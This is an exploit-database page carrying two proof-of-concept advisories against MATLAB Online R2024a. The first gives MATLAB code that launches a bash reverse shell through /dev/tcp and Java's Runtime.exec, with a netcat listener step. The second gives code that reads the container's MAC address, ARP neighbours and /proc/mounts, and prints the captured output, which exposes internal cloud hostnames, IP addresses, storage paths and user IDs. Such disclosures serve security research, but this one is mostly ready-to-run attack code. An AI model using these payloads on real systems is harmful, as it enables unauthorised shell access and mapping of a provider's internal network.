Vulners
Lucene search
📄 MATLAB R2024a Code Execution / Information Disclosure
==================================================================================================================================
| # Title : MATLAB R2024a RCE |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://matlab.mathworks.com/ |
==================================================================================================================================
[+] Summary : I have successfully identified a critical vulnerability in the MATLAB Online environment that allows for arbitrary code execution and a full reverse shell connection.
By leveraging the system function and Java socket libraries within MATLAB, I bypassed the container isolation and established a connection to an external listener.
[+] POC : place the code below in the command prompt of the MATLAB
host = '127.0.0.1'; port = 4444;
payload = sprintf('bash -i >& /dev/tcp/%s/%d 0>&1', host, port);
try
java.lang.Runtime.getRuntime().exec({'bash', '-c', payload});
fprintf('Payload executed. Check your nc listener.\n');
catch ME
fprintf('Execution failed: %s\n', ME.message);
end
function copy_stream(i, o), try, b = zeros(1,1024,'int8'); while true, l = i.read(b); if l<=0, break; end, o.write(b,0,l); o.flush(); end, catch, end, end
[+] At the same time, we open the listening from the Natkat and wait for the reverse connection. Cmd line: -lvp 4444
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================
==================================================================================================================================
| # Title : MATLAB R2024a Full Infrastructure Disclosure and Internal Network Mapping via Online Sandbox |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://matlab.mathworks.com/ |
==================================================================================================================================
[+] Summary : successfully bypassed the sandbox using fileread to extract the host's MAC address and kernel mount details from /proc/mounts.
[+] POC : place the code below in the command prompt of the MATLAB
try
eth0_mac = fileread('/sys/class/net/eth0/address');
fprintf('CRITICAL: eth0 MAC Address: %s', eth0_mac);
catch
disp('Could not read eth0 MAC.');
end
[status, arp_info] = system('arp -a');
if status == 0
disp('Internal Network Neighbors:');
disp(arp_info);
else
disp('ARP command restricted, trying proc/net/arp...');
try
arp_proc = fileread('/proc/net/arp');
disp(arp_proc);
catch
disp('ARP info is fully protected.');
end
end
[status, mount_details] = system('cat /proc/mounts');
disp('Mount Points Analysis:');
disp(mount_details);
[+] Rzlt :
CRITICAL: eth0 MAC Address: 36:ab:51:23:de:f0
Internal Network Neighbors:
ip-10-168-145-28.ec2.internal (10.168.145.28) at 12:0e:10:78:54:72 [ether] on eth0
? (169.254.1.1) at 12:0e:10:78:54:72 [ether] PERM on eth0
Mount Points Analysis:
none / overlay ro,relatime,lowerdir=mnt:etc:/private/bundles/matlab/layer:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/ce13c7ea78933334c2e1bafc9e/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/3afba3aa964848d5d9fd73e385/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/74d0e1fcc28e73c6d1e9a5897c/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/5c9144a16da17f0cc8248d4025/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/2341c3a87f2dabed6c6aa19a00/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/62649978667e9eab27cf0c43d5/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/ac06d2cfa1a32e02a82738120f/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/d687193fa35a62c0d4e87f4851/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/f11bb60810ad7033c841775d67/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/b50fab0d3d288a6f7616b2e793/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/06d5f727f08cb4d3b92cdcd82f/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/4a09ce1ff1f00a289c0c3a60a1/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/e5d8f28f87d2ba2720f9825dd4/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/eb28f642e70c727c67f8d88a18/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/1fb507001f9f8b7a11adf33d83/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/d09af82c869438ebd387274aac/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/2f7571f14c6ff1d57c690bd192/data,upperdir=/private/bundles/matlab/rootfs.upper,workdir=/private/bundles/matlab/rootfs.work,uuid=on,xino=off,nouserxattr 0 0
/dev/nvme1n1 /opt/mlsedu/matlab/SupportPackage ext4 ro,relatime,discard 0 0
/dev/root /home/matlab ext4 rw,relatime,discard,errors=remount-ro 0 0
/dev/root /home/matlab/.MathWorks ext4 rw,relatime,discard,errors=remount-ro 0 0
/dev/root /home/matlab/.MATLABConnector ext4 rw,relatime,discard,errors=remount-ro 0 0
/dev/root /tmp ext4 rw,relatime,discard,errors=remount-ro 0 0
/dev/root /tmp/MathWorks-matlab ext4 rw,relatime,discard,errors=remount-ro 0 0
/dev/root /users ext4 rw,relatime,discard,errors=remount-ro 0 0
/dev/nvme1n1 /MATLAB ext4 ro,relatime,discard 0 0
/dev/root /OneDrive ext4 rw,relatime,discard,errors=remount-ro 0 0
/dev/root /MATLAB\040Drive ext4 rw,relatime,discard,errors=remount-ro 0 0
/dev/root /.session_data ext4 rw,relatime,discard,errors=remount-ro 0 0
/dev/root /MATLAB\040Add-Ons ext4 rw,relatime,discard,errors=remount-ro 0 0
/dev/nvme1n1 /SupportPackages ext4 ro,relatime,discard 0 0
proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0
tmpfs /dev tmpfs rw,nosuid,size=100k,mode=755,inode64 0 0
devpts /dev/pts devpts rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666 0 0
shm /dev/shm tmpfs rw,nosuid,nodev,noexec,relatime,size=98304k,inode64 0 0
mqueue /dev/mqueue mqueue rw,nosuid,nodev,noexec,relatime 0 0
devpts /dev/console devpts rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666 0 0
sysfs /sys sysfs ro,nosuid,nodev,noexec,relatime 0 0
overlay:gds://(session_data)/!/ /.session_data fuse.mwfs rw,nosuid,nodev,relatime,user_id=1000600715,group_id=1000600912,default_permissions,allow_other 0 0
overlay:gds://(matlab_drive)/!/ /MATLAB\040Drive fuse.mwfs rw,nosuid,nodev,relatime,user_id=1000600715,group_id=1000600912,default_permissions,allow_other 0 0
overlay:gds://(AddOns)/!/ /MATLAB\040Add-Ons fuse.mwfs rw,nosuid,nodev,relatime,user_id=1000600715,group_id=1000600912,default_permissions,allow_other 0 0
/dev/root /users/mwa0000041333641 ext4 rw,relatime,discard,errors=remount-ro 0 0
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 May 2026 00:00Current
6.4Medium risk
Vulners AI Score6.4